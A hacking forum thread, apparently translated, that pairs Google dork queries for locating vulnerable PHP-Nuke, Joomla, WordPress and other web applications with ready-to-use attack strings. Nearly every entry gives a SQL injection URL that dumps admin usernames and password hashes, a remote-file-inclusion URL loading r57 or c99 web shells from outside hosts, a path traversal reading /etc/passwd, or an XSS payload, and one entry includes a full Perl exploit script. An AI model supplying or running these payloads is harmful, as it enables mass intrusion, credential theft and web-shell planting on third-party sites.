More Dorks Than You Want ....!

02-07-2013 01:23
#1
Fearlessleon
PHP-Nuke (Kose_Yazilari) Vulnerability

Google search: ''name Kose_Yazilari op viewarticle artid''
Google search: ''name Kose_Yazilari op printpage artid''

Append to the site: modules.php?name=""KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors

modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors



WorldTube Vulnerability

Google search: "inurl:/plugins/wordtube"

Append to the site: wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt?

Note: after the http part you need your own shell address.



Joomla Component EventList Vulnerability

Google search: intext: Event List 0.8 Alpha by schlu.net

Append to the site: //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*



Powered By 6rbScript Vulnerability

Google search: Powered by 6rbScript

Append to the site

PWD

http://www.xxx.com/news.php?newsid=7...m3na_authors--

USER

http://www.xxx.com/news.php?newsid=7...m3na_authors--



Com-Actualite Vulnerability

Google search: allinurl: "com_actualite"

Append to the site: index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*



Com-Mtree Vulnerability

Google search: inurl:"/com_mtree/"

Append to the site: http://[target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=



Webring Component (component_dir) Vulnerability

Google search: inurl:com_webring

Append to the site: http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?



Com-Lmo Vulnerability

Google search: "com_lmo"

Append to the site: $lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";



Com-PonyGallery Vulnerability

Google search: inurl:"index.php?option=com_ponygallery"

Append to the site: //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*



Com-NeoRecruit Vulnerability

Google search: inurl:index.php?option=com_NeoRecruit

Append to the site: //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*



Com-Rsfiles Vulnerability

Google search: inurl:"/index.php?option=com_rsfiles"

Append to the site: //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=



Com-Nicetalk Vulnerability

Google search: inurl:index.php?option=com_nicetalk

Append to the site: //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*



Com-Joomlaradiov5

Google search: inurl:"com_joomlaradiov5"

Append to the site: http://www.site.com/administrator/co.../c99haxor.txt?



Com-JoomlaFlashFun Vulnerability

Google search: "com_joomlaflashfun"

Append to the site: XXX.net: The Leading XXX Site on the Net[attacker]



Carousel Flash Image Vulnerability

Google search: inurl:"com_jjgallery"

Append to the site: http://[Taget]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?



Com-Mambads Vulnerability

Google search: inurl:com_mambads

Append to the site:
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*

Powered By: MFH v1 Vulnerability

Dork: "Powered by: MFH v1"

Exploitation options:

Step 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+-- to get the users

Step 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+-- to get the admin info

Step 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+-- to get the ftp server info (if it is configured)




W.G.C.C Vulnerability

Google Dork : "Web Group Communication Center"

Exploit:
XSS:
http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C




Powered By Zomplog Vulnerability

Dork: "powered by zomplog"

Exploit:
http://localhost/path/upload/force_d...e_download.php




Xcart RFI Vulnerability

Google dork : "X-CART. Powerful PHP shopping cart software"

Exploit

site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt?




Vulnerability in Plugin-Class based systems

Google Dork: index.php?loc= or allinurl:.br/index.php?loc=

Exploit:

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"

Note: in the 2nd dork you can replace the .br/ part with the country extension you want to target...




Powered By Linkspile Vulnerability

Dork : Powered By linkspile

Exploit :

Example Domain x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*



The Realestate ****** Vulnerability

Dork : inurl:dpage.php?docID

Exploit : Example Domain ord)+from+admin




Calogic Calendars V1.2.2 Vulnerability

Dork : "CaLogic Calendars V1.2.2"

POC : http://localhost/[******_PATH]/userreg.php?langsel={SQL}

Example : http://localhost/[******_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--




Powered By PHPizabi Vulnerability

Dork: "Powered by PHPizabi v0.848b C1 HFP1"

Exploit:

http://localhost/izabi/system/cache/...s/id_shell.php

Example:

http://localhost/izabi/system/image.....php&width=500




AJ Auction 6.2.1 Vulnerability

DORK: inurl:"classifide_ad.php"

Exploit:

http://site.com/classifide_ad.php?it...assword),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*




Powered By Novus Vulnerability

Dork: "Powered by Novus"

Server information:

http://[novus]/notas.asp?nota_id=1+a...t(int,db_name())
http://[novus]/notas.asp?nota_id=1+a...nt,system_user)
http://[novus]/notas.asp?nota_id=1+a...@servername)--
http://[novus]/notas.asp?nota_id=1+a...t,@@version)--




Com-Mgm Vulnerability

Google Dork: inurl:"com_mgm"

Exploit:

administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Com-Loudmounth Vulnerability

Dork: inurl:com_loudmounth

Exploit:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Com-Thopper Vulnerability

Google Dork: inurl:com_thopper or inurlhp?option=com_thopper

Exploit:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?




Com-Bsq-Sitestats Vulnerability

Google Dork: inurl:com_bsq_sitestats

Exploit:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt?




Com-PeopleBook Vulnerability

Google Dork: inurl:com_peoplebook

Exploit:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Joomla Component AstatsPRO Vulnerability

Dork: allinurl: "com_astatspro"

Exploit: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*




WorkingOnWeb 2.0.1400 Vulnerability

Dork: Powered by WorkingOnWeb 2.0.1400

Exploit:

http://localhost/events.php?idevent=...ll,0,0,0,0,0,0, 0/**/from/**/mysql.user/*




Powered by cpDynaLinks Vulnerability

Dork: Powered by cpDynaLinks

connecting in http://127.0.0.1/...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039

use strict;
use LWP::UserAgent;

my $host = $ARGV[0];

if(!$ARGV[0]) {
print "\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print "
written by ka0x - ka0x01[at]gmail.com\n";
print "
usage: perl $0 [host]\n";
print "
example: http://host.com/cpDynaLinks\n";
exit(1);
}

print "\n
connecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host."/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*");
if ($go->content =~ m/____(.*?)____/ms) {
print "$1\n";
} else {
print "\n[-] exploit failed\n";
}
On the returned page, use "view source". The admin nick, MD5 hashes etc. are in the first lines.




Maplab-2.2 Vulnerability

Dorks:

index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/

Exploit:
http://site.com/pathmaplab/htdocs/gm...hp?gszAppPath=[EvilScript]




Admidio 1.4.8 RFI Vulnerability

Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : http://demo.admidio.org/adm_program/...efault_folder=




ezContents CMS Vulnerability

Dork: "ezContents CMS Version 2.0.0"

Exploits:

http://site.com/[patch]/showdetails.php?contentname="'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*

Exploits 2:

http://site.com/[patch]/printer.php?article='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*




SoftbizScripts Vulnerability

Dork: "inurl:Powered by SoftbizScripts" or "Subscribe Newsletter"

Exploit: http://www.ssss.com/hostdirectory/se...php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--

This is a ****** vulnerability...




ProfileCMS v1.0 Vulnerability

Dork: "Powered By ProfileCMS v1.0" or "Total Generators & Widgets"

Exploit: http://target.com/index.php?app=prof...x3a,username,0 x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20u sers/*

target.org a,password,0x3a,email),3,4,5,6%20from%20users/*

Target.net a,password,0x3a,email),3,4,5,6%20from%20users/*

Target.net 3737764),3,4,5,6%20from%20users/*




Com-Rsgallery Vulnerability

Dork: "option=com_rsgallery" or inurl:index.php?option=com_rsgallery

Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--

Returns the admin nick, hashes etc. It is a vulnerability found in Joomla.

Admin login: /administrator/




Powered By Power Editor Vulnerability

Dork: Powered By Power Editor

Exploit: http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir] Example: editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..




Kmitam Vulnerability

Dork: "inurl:/kmitam/"

Poc/Exploit: kmitaadmin/kmitam/htmlcode.php?file=http://attacker.com/evil?

Method: Shell




BackLinkSpider Vulnerability

Dork: "Powered By BackLinkSpider" or "inurl:backlinkspider.php"

Exploit: http://www.site.com/[backlinkspider_page_name].php?cat_id=[SQL]

http://www.site.com/[backlinkspider_page_name].php?cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,0,1,version (),3,4,5,6,7,8,9,0/*
02-07-2013 14:04
#2
Fearlessleon
bump